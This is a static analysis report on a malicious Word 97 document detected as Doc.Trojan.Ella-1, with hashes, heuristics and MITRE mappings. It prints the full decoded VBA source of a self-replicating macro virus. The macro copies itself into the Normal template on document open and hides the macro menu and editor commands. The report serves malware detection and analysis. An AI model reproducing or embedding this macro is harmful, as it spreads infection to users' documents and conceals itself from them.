Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4937f45efc29ac34…

MALICIOUS

Office (OLE)

32.5 KB Created: 2000-02-24 10:24:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: f6c49e2dde81b287e613c0dbfc5811de SHA-1: 1a9b0efe899c32351e56413fbc032c62e23fe31f SHA-256: 4937f45efc29ac34e20ee575b071a29eb77c8b6481b286e1cf822496846a4d71
188 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Microsoft Word document containing a VBA macro. The AutoOpen subroutine is present and configured to run automatically when the document is opened. This macro attempts to copy itself and potentially execute further actions, indicated by the presence of legacy WordBasic macro virus markers and ClamAV detection as Doc.Trojan.Ella-1. The macro's primary function appears to be related to self-propagation or execution of additional malicious code, though the exact payload is not directly observable.

Heuristics 5

  • ClamAV: Doc.Trojan.Ella-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ella-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Application.OrganizerCopy ThisDocument.FullName, Target.FullName, "H8", wdOrganizerObjectProjectItems
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1126 bytes
SHA-256: e2bccc3b59fd1bee3a771fea3dc9b6a25bc658e58d1c3c5767ef9122a7ff1449
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Attribute VB_Name = "H8"
Sub AutoOpen()
On Error Resume Next
ShowVisualBasicEditor = true 
Options.VirusProtection = true 
Options.SaveNormalPrompt = true 
Options.ConfirmConversions = true 
CommandBars("Tools").Controls("Macro").Delete
If ThisDocument = NormalTemplate Then Set Target = ActiveDocument Else Set Target = NormalTemplate
Application.OrganizerCopy ThisDocument.FullName, Target.FullName, "H8", wdOrganizerObjectProjectItems
If Target = ActiveDocument Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
Sub ToolsOptions()
Options.VirusProtection = True
Options.SaveNormalPrompt = True
Options.ConfirmConversions = True
Dialogs(wdDialogToolsOptions).Show
Options.VirusProtection = true 
Options.SaveNormalPrompt = true 
Options.ConfirmConversions = true 
End Sub
Sub ToolsMacro()
End Sub
Sub ViewVBCode()
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.